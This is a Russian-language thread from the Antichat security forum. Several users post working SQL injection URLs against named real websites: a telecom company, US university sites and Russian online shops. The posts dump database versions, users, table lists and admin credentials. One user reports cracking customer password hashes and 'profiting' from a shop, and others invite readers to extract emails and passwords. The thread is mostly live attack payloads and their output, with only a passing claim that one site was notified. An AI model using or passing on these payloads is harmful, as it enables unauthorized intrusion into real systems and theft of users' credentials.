ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.matrixtelecom.ru. Компания Матрикс Телеком.

Практически любой параметр в передаваемых скриптам уязвим к SQL-Injection. Сложность состоит в том, что отключён вывод ошибок в страницу и фильтруется кавычка. Ну это скорее не сложность, а маленькая неприятность. Админка находится на урле http://www.matrixtelecom.ru/admin, которая требует авторизации доступа. Это не беда - тут есть SQL Injection. Приступим:

-- Определяем версию
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,DATABA SE()/*

-- Перебираем колонки (интересующая нас с индексом 16 и именем mx_conf)
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11+FR OM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1/*

-- Перебираем поля в этой таблице
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x 6d785f636f6e66+LIMIT+X,1/*

-- Получаем структуру таблицы настроек сайта: mx_con(cnf_name, сnf_def, cnf_value)
-- Перебираем настройки сайта из таблицы mx_con
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+X,1/*

-- Нас интересует логин
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+0,1/*

-- И пароль
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+1,1/*

Всё... Доступ в админку открыт...

З.Ы. Администрация сайта уведомлена о данном баге. Не стоит дефейсить или менять контент.

Google: PR - 7
http://primes.utm.edu
University of Tennessee at Martin Martin, TN 38238

4.1.20-log:primes_@localhost:primes

Google: PR - 5
theboard.byu.edu

http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24/*

5.0.24-Debian_1-log:100hourboard@localhost:100hourboard

http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+TABLE_NAME,TABLE_SCHEMA,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+inf ormation_schema.tables+limit+150,1/*

смотрим таблици


[100hourboard]

100Hrbb_banlist
100Hrbb_categories
100Hrbb_config
100Hrbb_confirm
100Hrbb_disallow
100Hrbb_easymod
100Hrbb_forum_prune
100Hrbb_forums
100Hrbb_groups
100Hrbb_posts
100Hrbb_posts_text
100Hrbb_privmsgs
100Hrbb_privmsgs_text
100Hrbb_ranks
100Hrbb_search_results
100Hrbb_search_wordlist
100Hrbb_search_wordmatch
100Hrbb_sessions
100Hrbb_smilies
100Hrbb_themes
100Hrbb_themes_name
100Hrbb_topics
100Hrbb_topics_watch
100Hrbb_user_group
100Hrbb_vote_desc
и тд

вот нужные таблици но у меня нет начал лагать кто хочет подберите столбци и получите пассы и мыла
100Hrbb_users
phprojekt_users

evruka.ru - Интернет-магазин
4.1.21-log:evrubase:giftshop@82.179.244.68
Подобрал название столбцов:
Получил: 89637:40f939d31d2e2a25
Но при запросе:
Получил совершенно другой хэш: 3e70346730b14ce7
У меня 2 вопроса почему так получается и каким алгоритмом шифруется пароль

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

1.Мож есть нулевое значение passwd (null)
2.MySQL (16 значный хеш) (не перепутай с Mysql5)

__________________
Карфаген должен быть разрушен...

Интернет магазин 1 d o l l a r . r u, даже выплаты на автомате

mysql: 4.1.22-standard-log

Вытащил пароли всех юзеров, пароли в md5, половину только расшифровал, и немного поживился

хм
berkeley.edu
скрипт: journalism.berkeley.edu/students/resume.php
параметр: ID
кол-во колонок: 23
версия: 4.1.22
юзер: jschool@localhost
база: facebook

дальше не пошло. может мускул 3 версии , где то в топике была ссылка на статью по инъекции в 3 версию... лень искать...
а может хитрый какой нить запрос ... не знаю... крутите дальше кто хочет )